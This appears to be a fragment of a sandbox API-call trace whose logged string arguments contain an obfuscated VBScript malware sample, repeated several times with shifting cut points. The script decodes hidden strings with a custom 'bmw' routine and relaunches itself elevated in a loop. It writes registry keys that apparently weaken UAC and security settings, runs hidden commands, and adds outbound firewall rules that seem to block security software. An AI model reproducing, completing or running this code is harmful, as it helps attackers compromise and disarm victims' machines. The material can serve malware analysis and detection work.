CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.297] wcsncmp (_String1=",1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.297] wcsncmp (_String1="1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.297] wcsncmp (_String1=",1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.297] wcsncmp (_String1="1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.297] wcsncmp (_String1=")) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend 